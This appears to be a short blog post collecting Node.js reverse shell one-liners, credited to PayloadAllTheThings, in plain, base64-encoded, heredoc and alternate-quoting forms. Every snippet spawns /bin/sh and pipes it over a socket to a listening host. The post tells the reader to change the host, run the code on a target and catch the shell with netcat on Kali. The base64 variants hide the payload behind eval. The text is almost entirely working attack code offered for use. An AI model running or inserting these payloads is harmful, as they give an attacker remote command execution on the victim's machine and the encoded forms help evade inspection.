Snippets: NodeJS Reverse Shells
Reverse shells: nodejs one-line from cli, base64, heredoc
Published in
2 min readFeb 7, 2022
Here are a bunch of reverse shell snippets inspired by PayloadAllTheThings. Change the host, run the shell on the target and use this to catch the shell on Kali:
nc -lnvp 12345The snippets point to localhost so you can run the snippets on local to test. Enjoy your shells!
One-line from cli
Single-quote
node -e '(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(12345, "127.0.0.1", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();'Double-quote
node -e "(function(){ var net = require('net'), cp = require('child_process'), sh = cp.spawn('/bin/sh', []); var client = new net.Socket(); client.connect(12345, '127.0.0.1', function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();"Backticks
node -e '(function(){ var net = require(`net`), cp = require(`child_process`), sh = cp.spawn(`/bin/sh`, []); var client = new net.Socket(); client.connect(12345, `127.0.0.1`, function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();'Base64 encoded one-line from cli
(Decode Base64 portion with Cyberchef#From_Base64, change host and port then encode Cyberchef#To_Base64)
Single-quote
node -e 'eval(new Buffer("KGZ1bmN0aW9uKCl7IHZhciBuZXQgPSByZXF1aXJlKCJuZXQiKSwgY3AgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIiksIHNoID0gY3Auc3Bhd24oIi9iaW4vc2giLCBbXSk7IHZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOyBjbGllbnQuY29ubmVjdCgxMjM0NSwgIjEyNy4wLjAuMSIsIGZ1bmN0aW9uKCl7IGNsaWVudC5waXBlKHNoLnN0ZGluKTsgc2guc3Rkb3V0LnBpcGUoY2xpZW50KTsgc2guc3RkZXJyLnBpcGUoY2xpZW50KTsgfSk7IHJldHVybiAvYS87fSkoKTs=","base64").toString("ascii"))'Double-quote
node -e "eval(new Buffer('KGZ1bmN0aW9uKCl7IHZhciBuZXQgPSByZXF1aXJlKCJuZXQiKSwgY3AgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIiksIHNoID0gY3Auc3Bhd24oIi9iaW4vc2giLCBbXSk7IHZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOyBjbGllbnQuY29ubmVjdCgxMjM0NSwgIjEyNy4wLjAuMSIsIGZ1bmN0aW9uKCl7IGNsaWVudC5waXBlKHNoLnN0ZGluKTsgc2guc3Rkb3V0LnBpcGUoY2xpZW50KTsgc2guc3RkZXJyLnBpcGUoY2xpZW50KTsgfSk7IHJldHVybiAvYS87fSkoKTs=','base64').toString('ascii'))"Backticks
node -e 'eval(new Buffer(`KGZ1bmN0aW9uKCl7IHZhciBuZXQgPSByZXF1aXJlKCJuZXQiKSwgY3AgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIiksIHNoID0gY3Auc3Bhd24oIi9iaW4vc2giLCBbXSk7IHZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOyBjbGllbnQuY29ubmVjdCgxMjM0NSwgIjEyNy4wLjAuMSIsIGZ1bmN0aW9uKCl7IGNsaWVudC5waXBlKHNoLnN0ZGluKTsgc2guc3Rkb3V0LnBpcGUoY2xpZW50KTsgc2guc3RkZXJyLnBpcGUoY2xpZW50KTsgfSk7IHJldHVybiAvYS87fSkoKTs=`,`base64`).toString(`ascii`))'Without double-quotes
One-line (ANSI-C quoting)
node -e $'(function(){ var net = require(\'net\'), cp = require(\'child_process\'), sh = cp.spawn(\'/bin/sh\', []); var client = new net.Socket(); client.connect(12345, \'127.0.0.1\', function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();'One-line Base64 (ANSI-C quoting)
(Decode Base64 portion with Cyberchef#From_Base64, change host and port then encode Cyberchef#To_Base64)
node -e $'eval(new Buffer(\'KGZ1bmN0aW9uKCl7IHZhciBuZXQgPSByZXF1aXJlKCJuZXQiKSwgY3AgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIiksIHNoID0gY3Auc3Bhd24oIi9iaW4vc2giLCBbXSk7IHZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOyBjbGllbnQuY29ubmVjdCgxMjM0NSwgIjEyNy4wLjAuMSIsIGZ1bmN0aW9uKCl7IGNsaWVudC5waXBlKHNoLnN0ZGluKTsgc2guc3Rkb3V0LnBpcGUoY2xpZW50KTsgc2guc3RkZXJyLnBpcGUoY2xpZW50KTsgfSk7IHJldHVybiAvYS87fSkoKTs=\',\'base64\').toString(\'ascii\'))'Heredoc
node - <<EOF
(function(){ var net = require('net'), cp = require('child_process'), sh = cp.spawn('/bin/sh', []); var client = new net.Socket(); client.connect(12345, '127.0.0.1', function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();
EOFHeredoc Base64
(Decode Base64 portion with Cyberchef#From_Base64, change host and port then encode Cyberchef#To_Base64)
node - <<EOF
eval(new Buffer('KGZ1bmN0aW9uKCl7IHZhciBuZXQgPSByZXF1aXJlKCJuZXQiKSwgY3AgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIiksIHNoID0gY3Auc3Bhd24oIi9iaW4vc2giLCBbXSk7IHZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOyBjbGllbnQuY29ubmVjdCgxMjM0NSwgIjEyNy4wLjAuMSIsIGZ1bmN0aW9uKCl7IGNsaWVudC5waXBlKHNoLnN0ZGluKTsgc2guc3Rkb3V0LnBpcGUoY2xpZW50KTsgc2guc3RkZXJyLnBpcGUoY2xpZW50KTsgfSk7IHJldHVybiAvYS87fSkoKTs=','base64').toString('ascii'))
EOFWithout single-quotes
One-line
node -e "(function(){ var net = require(\"net\"), cp = require(\"child_process\"), sh = cp.spawn(\"/bin/sh\", []); var client = new net.Socket(); client.connect(12345, \"127.0.0.1\", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();"One-line Base64
(Decode Base64 portion with Cyberchef#From_Base64, change host and port then encode Cyberchef#To_Base64)
node -e "eval(new Buffer(\"KGZ1bmN0aW9uKCl7IHZhciBuZXQgPSByZXF1aXJlKCJuZXQiKSwgY3AgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIiksIHNoID0gY3Auc3Bhd24oIi9iaW4vc2giLCBbXSk7IHZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOyBjbGllbnQuY29ubmVjdCgxMjM0NSwgIjEyNy4wLjAuMSIsIGZ1bmN0aW9uKCl7IGNsaWVudC5waXBlKHNoLnN0ZGluKTsgc2guc3Rkb3V0LnBpcGUoY2xpZW50KTsgc2guc3RkZXJyLnBpcGUoY2xpZW50KTsgfSk7IHJldHVybiAvYS87fSkoKTs=\",\"base64\").toString(\"ascii\"))"Heredoc
node - <<EOF
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(12345, "127.0.0.1", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();
EOFHeredoc Base64
node - <<EOF
eval(new Buffer("KGZ1bmN0aW9uKCl7IHZhciBuZXQgPSByZXF1aXJlKCJuZXQiKSwgY3AgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIiksIHNoID0gY3Auc3Bhd24oIi9iaW4vc2giLCBbXSk7IHZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOyBjbGllbnQuY29ubmVjdCgxMjM0NSwgIjEyNy4wLjAuMSIsIGZ1bmN0aW9uKCl7IGNsaWVudC5waXBlKHNoLnN0ZGluKTsgc2guc3Rkb3V0LnBpcGUoY2xpZW50KTsgc2guc3RkZXJyLnBpcGUoY2xpZW50KTsgfSk7IHJldHVybiAvYS87fSkoKTs=","base64").toString("ascii"))
EOFSome other articles you might like
